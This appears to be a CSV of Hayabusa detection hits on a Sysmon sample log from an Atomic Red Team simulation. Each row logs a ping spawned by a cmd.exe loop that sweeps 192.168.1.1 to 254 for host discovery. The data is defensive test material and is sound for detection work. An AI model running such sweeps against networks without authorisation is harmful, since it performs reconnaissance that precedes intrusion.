2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
